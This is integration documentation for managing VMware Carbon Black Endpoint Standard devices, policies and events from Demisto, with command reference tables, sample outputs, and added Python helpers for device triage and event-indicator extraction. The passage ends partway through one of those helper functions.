VMware Carbon Black Endpoint Standard
Overview
Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Demisto.
Use cases
- Get information about events, policies, devices, and processes on Carbon Black.
- Update events, policies, devices, and processes on Carbon Black.
- Delete rules from policies.
- Create new policies.
Configure VMware Carbon Black Endpoint Standard on Demisto
- Navigate to Settings > Integrations > Servers & Services.
- Search for VMware Carbon Black Endpoint Standard.
- Click Add instance to create and configure a new integration.
- Name : a textual name for the integration instance.
- Server URL (example: https://192.168.0.1)
- API Key
- API Version
- Connector ID
- Fetch incidents
- Incident type
- SIEM key: Use to fetch incidents.
- SIEM Connector ID: Use to fetch incidents.
- Do not validate server certificate (not secure)
- Use system proxy settings
- Click Test to validate the URLs, token, and connection.
Commands
- Get the status of multiple devices: cbd-get-devices-status
- Get the status of a specified device: cbd-get-device-status
- Change the security policy assigned to a device: cbd-change-device-status
- Get multiple events: cbd-find-events
- Get a specified event: cbd-find-event
- Get multiple processes: cbd-find-processes
- Get alert details: cbd-get-alert-details
- Get all policy details: cbd-get-policies
- Get the details of a specified policy: cbd-get-policy
- Create a policy: cbd-create-policy
- Update a policy: cbd-update-policy
- Delete a policy: cbd-delete-policy
- Add a rule to a policy: cbd-add-rule-to-policy
- Delete a rule from a policy: cbd-delete-rule-from-policy
- Update a rule in a policy: cbd-update-rule-in-policy
- Set a policy: cbd-set-policy
Get the status of multiple devices
Retrieves the status of multiple devices, as specified by further input.
Base Command
cbd-get-devices-status
Input
Parameter | Description | More Information |
---|---|---|
hostName | Host name of the device to search for | Case insensitive |
hostNameExact | Exact host name of the device to search for | Case sensitive |
ownerName | Device owner name | Case insensitive |
ownerNameExact | Exact device owner name | Case sensitive |
ipAddress | External or internal IP address of the device to search for | - |
start | Shows results from this row onward | - |
rows | Maximum number of result rows | This parameter can be capped on the Cb Defense server side |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime | Activation code expiry time |
CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress | Last external IP address |
CarbonBlackDefense.GetDevicesStatus.Results.LastLocation | Last location |
CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime | Last reported time |
CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime | Last shutdown time |
CarbonBlackDefense.GetDevicesStatus.Results.OsVersion | Operating system version |
CarbonBlackDefense.GetDevicesStatus.Results.PolicyId | Policy ID |
CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime | Registered time |
CarbonBlackDefense.GetDevicesStatus.Results.Status | Status |
CarbonBlackDefense.GetDevicesStatus.Results.DeviceId | Device ID |
CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId | Device owner ID |
CarbonBlackDefense.GetDevicesStatus.Results.DeviceType | Device type |
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId | Organization ID |
CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion | Sensor version |
CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType | Target priority type |
CarbonBlackDefense.GetDevicesStatus.Results.Email | Email address |
CarbonBlackDefense.GetDevicesStatus.Results.LastContact | Last contact |
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName | Organization name |
CarbonBlackDefense.GetDevicesStatus.Results.SensorStates | Sensor states |
CarbonBlackDefense.GetDevicesStatus.Results.AvStatus | AV status |
CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress | Last internal IP address |
CarbonBlackDefense.GetDevicesStatus.Results.Name | Name |
CarbonBlackDefense.GetDevicesStatus.Results.PolicyName | Policy name |
CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate | Sensor out-of-date |
CarbonBlackDefense.GetDevicesStatus.Results.TestId | Test ID |
Command Example
!cbd-get-devices-status rows="1"
Context Example
    {
        "CarbonBlackDefense": {
            "GetDevicesStatus": {
                "Results": {
                    "ActivationCodeExpiryTime": 1524157210454,
                    "AvStatus": null,
                    "LastContact": 1533646970617,
                    "LastLocation": "OFFSITE",
                    "Name": "cberninger-mac2",
                    "LastExternalIpAddress": "67.143.208.113",
                    "TestId": -1,
                    "PolicyId": 6525,
                    "OrganizationId": 1105,
                    "RegisteredTime": 1523552410489,
                    "TargetPriorityType": "MEDIUM",
                    "DeviceType": "MAC",
                    "DeviceId": 844355,
                    "Status": "REGISTERED",
                    "OsVersion": "MAC OS X 10.10.5",
                    "LastReportedTime": 1533642023089,
                    "DeviceOwnerId": 278380,
                    "LastShutdownTime": 1533587921518,
                    "SensorOutOfDate": false,
                    "LastInternalIpAddress": "192.168.2.125",
                    "SensorStates": [
                        "ACTIVE",
                        "LIVE_RESPONSE_NOT_RUNNING",
                        "LIVE_RESPONSE_NOT_KILLED",
                        "LIVE_RESPONSE_DISABLED",
                        "SECURITY_CENTER_OPTLN_DISABLED"
                    ],
                    "Email": "cberninger",
                    "PolicyName": "default",
                    "OrganizationName": "cb-internal-alliances.com",
                    "SensorVersion": "3.0.2.8"
                }
            }
        }
    }
Human Readable Output
ActivationCodeExpiryTime | 1524157210454 |
---|---|
AvStatus | |
DeviceId | 844355 |
DeviceOwnerId | 278380 |
DeviceType | MAC |
Email | cberninger |
LastContact | 1533646970617 |
LastExternalIpAddress | 67.143.208.113 |
LastInternalIpAddress | 192.168.2.125 |
LastLocation | OFFSITE |
LastReportedTime | 1533642023089 |
LastShutdownTime | 1533587921518 |
Name | cberninger-mac2 |
OrganizationId | 1105 |
OrganizationName | cb-internal-alliances.com |
OsVersion | MAC OS X 10.10.5 |
PolicyId | 6525 |
PolicyName | default |
RegisteredTime | 1523552410489 |
SensorOutOfDate | false |
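The time fields in this output (LastContact, LastReportedTime, RegisteredTime, LastShutdownTime) are Unix epoch milliseconds, so any "has this sensor gone quiet" check has to convert them before comparing. The Python below is an added example, not code from the integration or from Carbon Black: it takes a list of GetDevicesStatus results (the first entry copies the values from the context example above; the second is a constructed stale device), flags sensors that are out of date, have not contacted the backend within a window, or are not on the expected policy, and emits the cbd-change-device-status invocation documented later on this page that would move a drifted device back. The policy name "default", the three-day window, the reference time and the second device are assumptions.

```python
"""Triage of cbd-get-devices-status results (added example, not integration code)."""
from datetime import datetime, timedelta, timezone

# Constructed sample context. The first device copies the values shown on the
# page; the second is invented so that every check below fires at least once.
SAMPLE_RESULTS = [
    {
        "DeviceId": 844355, "Name": "cberninger-mac2", "DeviceType": "MAC",
        "Status": "REGISTERED", "PolicyName": "default", "PolicyId": 6525,
        "SensorVersion": "3.0.2.8", "SensorOutOfDate": False,
        "LastContact": 1533646970617, "LastInternalIpAddress": "192.168.2.125",
        "SensorStates": ["ACTIVE", "LIVE_RESPONSE_NOT_RUNNING",
                         "LIVE_RESPONSE_NOT_KILLED", "LIVE_RESPONSE_DISABLED",
                         "SECURITY_CENTER_OPTLN_DISABLED"],
    },
    {
        "DeviceId": 900001, "Name": "example-win-01", "DeviceType": "WINDOWS",
        "Status": "REGISTERED", "PolicyName": "legacy", "PolicyId": 1,
        "SensorVersion": "3.0.0.1", "SensorOutOfDate": True,
        "LastContact": 1533000000000, "LastInternalIpAddress": "10.0.0.5",
        "SensorStates": ["ACTIVE"],
    },
]


def millis_to_dt(ms):
    """Carbon Black reports times as epoch milliseconds. Integer timedelta
    arithmetic keeps the millisecond part exact instead of passing it
    through a float."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(milliseconds=ms)


def change_policy_command(device_id, policy_name):
    """The cbd-change-device-status call (documented on this page) that
    would move a device onto the named policy."""
    return f'!cbd-change-device-status deviceId="{device_id}" policyName="{policy_name}"'


def triage_devices(results, expected_policy, now_ms, max_silence=timedelta(days=3)):
    """Return one finding per device that needs attention.

    A device is flagged when its sensor is out of date, when it has not
    contacted the backend within max_silence, or when it is not on
    expected_policy. now_ms is the reference time in epoch milliseconds,
    passed in rather than read from the clock so the result is reproducible.
    """
    findings = []
    silence_limit_ms = int(max_silence.total_seconds() * 1000)
    for device in results:
        reasons = []
        if device.get("SensorOutOfDate"):
            reasons.append(f"sensor {device.get('SensorVersion')} is out of date")
        last_contact = device.get("LastContact")
        if last_contact is None:
            reasons.append("never contacted the backend")
        elif now_ms - last_contact > silence_limit_ms:
            reasons.append(f"silent since {millis_to_dt(last_contact).isoformat()}")
        drifted = device.get("PolicyName") != expected_policy
        if drifted:
            reasons.append(f"on policy {device.get('PolicyName')!r}, expected {expected_policy!r}")
        if reasons:
            findings.append({
                "DeviceId": device["DeviceId"],
                "Name": device.get("Name"),
                "Reasons": reasons,
                # Only policy drift has a one-command fix; an outdated or silent
                # sensor needs an upgrade or a look at the host itself.
                "Remediation": change_policy_command(device["DeviceId"], expected_policy) if drifted else None,
            })
    return findings


if __name__ == "__main__":
    # Reference time shortly after the page's own example was captured.
    for finding in triage_devices(SAMPLE_RESULTS, "default", now_ms=1533650000000):
        print(finding["DeviceId"], finding["Name"], "; ".join(finding["Reasons"]))
        if finding["Remediation"]:
            print("  ->", finding["Remediation"])
```

Run against the sample, the macOS device from the page passes every check and only the constructed device is reported, with the policy-change command attached. Note that SensorOutOfDate is the only field here that the backend evaluates for you; the silence window is a local judgement and should be tuned to how often the estate's endpoints are expected to be online.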
Get the status of a specified device
Retrieves the status of a specified device.
Base Command
cbd-get-device-status
Input
Parameter | Description |
---|---|
deviceId | Individual device ID |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | AV status |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Time of registration |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted by analytics |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted by analytics time |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Last reported time |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-get-device-status deviceId="844355"
Context Example
    {
        "CarbonBlackDefense": {
            "GetDeviceStatus": {
                "DeviceInfo": {
                    "ActivationCodeExpiryTime": null,
                    "AvStatus": null,
                    "LastContact": 1533648166041,
                    "LastLocation": "OFFSITE",
                    "Name": "cberninger-mac2",
                    "LastExternalIpAddress": "67.143.208.113",
                    "TestId": -1,
                    "PolicyId": 6525,
                    "OrganizationId": 1105,
                    "RegisteredTime": 1523552410489,
                    "TargetPriorityType": "MEDIUM",
                    "DeviceType": "MAC",
                    "DeviceId": 844355,
                    "Status": "REGISTERED",
                    "OsVersion": "MAC OS X 10.10.5",
                    "LastReportedTime": 1533642023089,
                    "DeviceOwnerId": 278380,
                    "LastShutdownTime": 1533587921518,
                    "SensorOutOfDate": false,
                    "LastInternalIpAddress": "192.168.2.125",
                    "SensorStates": [
                        "ACTIVE",
                        "LIVE_RESPONSE_NOT_RUNNING",
                        "LIVE_RESPONSE_NOT_KILLED",
                        "LIVE_RESPONSE_DISABLED",
                        "SECURITY_CENTER_OPTLN_DISABLED"
                    ],
                    "Email": "cberninger",
                    "PolicyName": "default",
                    "OrganizationName": "cb-internal-alliances.com",
                    "SensorVersion": "3.0.2.8"
                }
            }
        }
    }
Human Readable Output
ActivationCodeExpiryTime | |
---|---|
AvStatus | |
DeviceId | 844355 |
DeviceOwnerId | 278380 |
DeviceType | MAC |
Email | cberninger |
LastContact | 1533648166041 |
LastExternalIpAddress | 67.143.208.113 |
LastInternalIpAddress | 192.168.2.125 |
LastLocation | OFFSITE |
LastReportedTime | 1533642023089 |
LastShutdownTime | 1533587921518 |
Name | cberninger-mac2 |
OrganizationId | 1105 |
OrganizationName | cb-internal-alliances.com |
OsVersion | MAC OS X 10.10.5 |
PolicyId | 6525 |
PolicyName | default |
RegisteredTime | 1523552410489 |
SensorOutOfDate | false |
Change the security policy assigned to a device
Changes the security policy assigned to a specified device.
Base Command
cbd-change-device-status
Input
Parameter | Description |
---|---|
deviceId | The device ID |
policyId | The policy ID |
policyName | The policy name |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.CreateTime | Time of creation |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.DeviceId | Device ID |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.Email | Email address |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.LastLocation | Last location |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.OsVersion | Operating system version |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.AvStatus | Anti-virus status |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.RegisteredTime | Registration time |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.LastContact | Last contact |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.Status | Status |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.TestId | Test ID |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.PolicyId | Policy ID |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.UpdateVersion | Update version |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.OrganizationName | Organization name |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted by analytics |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.DeviceType | Device type |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.PolicyName | Policy name |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted by analytics time |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.SensorStates | Sensor states |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.Name | Name |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.Id | ID |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.LastReportedTime | Time of last report |
CarbonBlackDefense.ChangeDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-change-device-status deviceId="844355" policyName="default"
Context Example
    {
        "CarbonBlackDefense": {
            "ChangeDeviceStatus": {
                "DeviceInfo": {
                    "AvStatus": null,
                    "LastContact": 1533648445513,
                    "LastLocation": "OFFSITE",
                    "Name": "cberninger-mac2",
                    "LastExternalIpAddress": "67.143.208.113",
                    "TestId": -1,
                    "PolicyId": 6525,
                    "OrganizationId": 1105,
                    "RegisteredTime": 1523552410489,
                    "TargetPriorityType": "MEDIUM",
                    "DeviceType": "MAC",
                    "DeviceId": 844355,
                    "Status": "REGISTERED",
                    "OsVersion": "MAC OS X 10.10.5",
                    "LastReportedTime": 1533642023089,
                    "DeviceOwnerId": 278380,
                    "LastShutdownTime": 1533587921518,
                    "SensorOutOfDate": false,
                    "LastInternalIpAddress": "192.168.2.125",
                    "SensorStates": [
                        "ACTIVE",
                        "LIVE_RESPONSE_NOT_RUNNING",
                        "LIVE_RESPONSE_NOT_KILLED",
                        "LIVE_RESPONSE_DISABLED",
                        "SECURITY_CENTER_OPTLN_DISABLED"
                    ],
                    "Email": "cberninger",
                    "PolicyName": "default",
                    "OrganizationName": "cb-internal-alliances.com",
                    "SensorVersion": "3.0.2.8"
                }
            }
        }
    }
Human Readable Output
AvStatus | |
---|---|
DeviceId | 844355 |
DeviceOwnerId | 278380 |
DeviceType | MAC |
Email | cberninger |
LastContact | 1533648445513 |
LastExternalIpAddress | 67.143.208.113 |
LastInternalIpAddress | 192.168.2.125 |
LastLocation | OFFSITE |
LastReportedTime | 1533642023089 |
LastShutdownTime | 1533587921518 |
Name | cberninger-mac2 |
OrganizationId | 1105 |
OrganizationName | cb-internal-alliances.com |
OsVersion | MAC OS X 10.10.5 |
PolicyId | 6525 |
PolicyName | default |
RegisteredTime | 1523552410489 |
SensorOutOfDate | false |
SensorStates | ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED |
Get multiple events
Returns multiple event details, as specified by further input.
Base Command
cbd-find-events
Input
Parameter | Description | More Information |
---|---|---|
hostName | The host name of the device whose events to search for | Case insensitive. |
hostNameExact | The exact host name of the device whose events to find | Case sensitive. |
ownerName | Owner name of the device whose events to search for | Case insensitive. |
ownerNameExact | The exact owner name of the device whose events to search for | Case sensitive. |
ipAddress | External or internal IP address | - |
sha256hash | Searches for events generated by a process with this SHA-256 hash | Must be lowercase. |
applicationName | Searches for events generated by a process with this application name | Must be lowercase. |
eventType | Searches for events of this event type | - |
searchWindow | Events generated within this time frame | Default is one day. Events might not be available after 30 days due to retention policies. |
start | Shows results from this row onward | - |
rows | Maximum number of result rows | This parameter can be capped on the Cb Defense server side. |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.FindEvents.Results.EventType | Event type |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart | Milliseconds since process start |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name | Name |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid | Private PID |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId | Process ID |
CarbonBlackDefense.FindEvents.Results.ShortDescription | Short description |
CarbonBlackDefense.FindEvents.Results.CreateTime | Time of creation |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName | Device name |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion | Device version |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName | Policy name |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType | Target priority type |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation | Agent location |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId | Device ID |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address | IpV4 address of the device |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode | Area code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode | Country code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude | Latitude |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude | Longitude |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City | City |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName | Country name |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode | DMA code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode | Metro code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode | Postal code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region | Region |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress | Device IP address |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType | Device type |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email | Email address |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode | Target priority code |
CarbonBlackDefense.FindEvents.Results.EventId | Event ID |
CarbonBlackDefense.FindEvents.Results.EventTime | Event time |
CarbonBlackDefense.FindEvents.Results.LongDescription | Long description |
CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress | Dest address |
CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort | Dest port |
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn | Peer Fqdn |
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress | Peer IP address |
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address | Peer IpV4 address |
CarbonBlackDefense.FindEvents.Results.NetFlow.Service | Service |
CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress | Source address |
CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort | Source port |
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName | Application name |
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath | Application path |
CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash | MD5 hash |
CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.FindEvents.Results.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-events rows=1
Context Example
    {
        "CarbonBlackDefense": {
            "FindEvents": {
                "Results": {
                    "ShortDescription": "The application \"cloud-drive-ui\" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).",
                    "LongDescription": "The application \"/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui\" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.",
                    "SelectedApp": {
                        "ApplicationName": "cloud-drive-ui",
                        "ApplicationPath": "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui",
                        "EffectiveReputation": "LOCAL_WHITE",
                        "EffectiveReputationSource": "PRE_EXISTING",
                        "Md5Hash": "b43632f807770d141008deb988a65ad9",
                        "ReputationProperty": "NOT_LISTED",
                        "Sha256Hash": "f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b"
                    },
                    "EventTime": 1533649991975,
                    "CreateTime": 1533650036964,
                    "DeviceDetails": {
                        "DeviceName": "cberninger-mac2",
                        "DeviceVersion": "MAC OS X 10.10.5",
                        "TargetPriorityCode": 1,
                        "DeviceLocation": {
                            "City": null,
                            "CountryCode": "US",
                            "CountryName": "United States",
                            "Latitude": 37.751007,
                            "Longitude": -97.822,
                            "Region": null
                        },
                        "TargetPriorityType": "MEDIUM",
                        "DeviceType": "MAC",
                        "DeviceId": 844355,
                        "DeviceIpAddress": "67.143.208.113",
                        "DeviceIpV4Address": "67.143.208.113",
                        "AgentLocation": "OFFSITE",
                        "Email": "cberninger",
                        "PolicyName": "default"
                    },
                    "TargetApp": {
                        "ApplicationName": null,
                        "EffectiveReputation": null,
                        "EffectiveReputationSource": null,
                        "ReputationProperty": null,
                        "Sha256Hash": null
                    },
                    "ProcessDetails": {
                        "FullUserName": "cberninger",
                        "PrivatePid": "1071-1533502548722-245",
                        "ProcessId": 1071,
                        "Name": "cloud-drive-ui",
                        "TargetCommandLine": null,
                        "MilisSinceProcessStart": 147443253,
                        "UserName": "cberninger",
                        "TargetPrivatePid": null,
                        "TargetPid": null,
                        "TargetName": null,
                        "CommandLine": null
                    },
                    "EventType": "NETWORK",
                    "EventId": "4ad25ae99a4911e88515b3c49ffeda59"
                },
                "TotalResults": {
                    "TotalResults": 10666
                }
            }
        },
        "Endpoint": {
            "Domain": null,
            "Hostname": "cberninger-mac2",
            "IPAddress": "67.143.208.113",
            "OS": "MAC"
        },
        "Process": {
            "Path": null,
            "SHA1": null,
            "ParentID": null,
            "PID": 1071,
            "Name": "cloud-drive-ui",
            "Endpoint": null,
            "ParentName": null,
            "MD5": null,
            "CommandLine": null
        }
    }
Human Readable Output
CreateTime | 1533650036964 |
---|---|
DeviceDetails AgentLocation | OFFSITE |
DeviceDetails DeviceId | 844355 |
DeviceDetails DeviceIpAddress | 67.143.208.113 |
DeviceDetails DeviceIpV4Address | 67.143.208.113 |
DeviceDetails DeviceLocation City | |
DeviceDetails DeviceLocation CountryCode | US |
DeviceDetails DeviceLocation CountryName | United States |
DeviceDetails DeviceLocation Latitude | 37.751007 |
DeviceDetails DeviceLocation Longitude | -97.822 |
DeviceDetails DeviceLocation Region | |
DeviceDetails DeviceName | cberninger-mac2 |
DeviceDetails DeviceType | MAC |
DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
DeviceDetails Email | cberninger |
DeviceDetails PolicyName | default |
DeviceDetails TargetPriorityCode | 1 |
DeviceDetails TargetPriorityType | MEDIUM |
EventId | 4ad25ae99a4911e88515b3c49ffeda59 |
EventTime | 1533649991975 |
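Two things about cbd-find-events are easy to get wrong in a playbook: the sha256hash and applicationName inputs must be lowercase (a hash pasted from a Windows tool in uppercase silently matches nothing), and the hash fields in a result can be null when Cb Defense has no reputation record for the binary, so an indicator-extraction step has to tolerate that. The Python below is an added example, not code from the integration or from Carbon Black. It builds a cbd-find-events invocation with those input rules enforced, pulls hashes and network destinations out of a list of FindEvents results, and maps one event onto the Endpoint and Process keys shown in the context example above. The sample event copies the context example on this page; its NetFlow block is constructed from the event's LongDescription because the raw example did not print one, and which source field feeds which Endpoint/Process key is this example's own choice. The same handling applies to the EventInfo object returned by cbd-find-event.

```python
"""Working with cbd-find-events output (added example, not integration code)."""
import re

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")

# Constructed sample: one event copied from the context example on this page.
# The raw output printed no NetFlow block, so its values are taken from the
# event's LongDescription (192.168.2.125:56001 -> 192.168.2.22:6690).
SAMPLE_EVENTS = [
    {
        "EventId": "4ad25ae99a4911e88515b3c49ffeda59",
        "EventType": "NETWORK",
        "EventTime": 1533649991975,
        "ShortDescription": 'The application "cloud-drive-ui" successfully closed a TCP/6690 '
                            'connection to 192.168.2.22:6690 (192.168.2.22).',
        "SelectedApp": {
            "ApplicationName": "cloud-drive-ui",
            "ApplicationPath": "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui",
            "EffectiveReputation": "LOCAL_WHITE",
            "Md5Hash": "b43632f807770d141008deb988a65ad9",
            "Sha256Hash": "f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b",
        },
        # TargetApp is all-null in the page's example; modelled here as None.
        "TargetApp": None,
        "DeviceDetails": {"DeviceName": "cberninger-mac2", "DeviceIpAddress": "67.143.208.113",
                          "DeviceType": "MAC", "DeviceVersion": "MAC OS X 10.10.5"},
        "ProcessDetails": {"ProcessId": 1071, "Name": "cloud-drive-ui",
                           "PrivatePid": "1071-1533502548722-245", "CommandLine": None,
                           "UserName": "cberninger"},
        "NetFlow": {"SourceAddress": "192.168.2.125", "SourcePort": 56001,
                    "DestAddress": "192.168.2.22", "DestPort": 6690, "Service": "TCP/6690"},
    },
]


def is_valid_sha256(value):
    """True for exactly 64 lowercase hex characters, the form the page says the
    sha256hash input must have."""
    return bool(SHA256_RE.match(value))


def build_find_events_command(sha256hash=None, applicationName=None, eventType=None,
                              searchWindow=None, rows=None):
    """Build a !cbd-find-events line applying the documented input rules:
    sha256hash and applicationName are lowercased, and a hash that is not
    64 hex characters is rejected instead of silently matching nothing."""
    args = []
    if sha256hash is not None:
        sha256hash = sha256hash.strip().lower()
        if not is_valid_sha256(sha256hash):
            raise ValueError("sha256hash must be 64 hexadecimal characters")
        args.append(("sha256hash", sha256hash))
    if applicationName is not None:
        args.append(("applicationName", applicationName.strip().lower()))
    for name, value in (("eventType", eventType), ("searchWindow", searchWindow), ("rows", rows)):
        if value is not None:
            args.append((name, str(value)))
    return "!cbd-find-events " + " ".join(f'{k}="{v}"' for k, v in args)


def extract_indicators(results):
    """Collect hashes and network destinations from a list of event results,
    skipping the null hashes Cb Defense returns for unresolved applications."""
    sha256, md5, destinations = set(), set(), set()
    for event in results:
        for app_key in ("SelectedApp", "TargetApp"):
            app = event.get(app_key) or {}
            if app.get("Sha256Hash"):
                sha256.add(app["Sha256Hash"].lower())
            if app.get("Md5Hash"):
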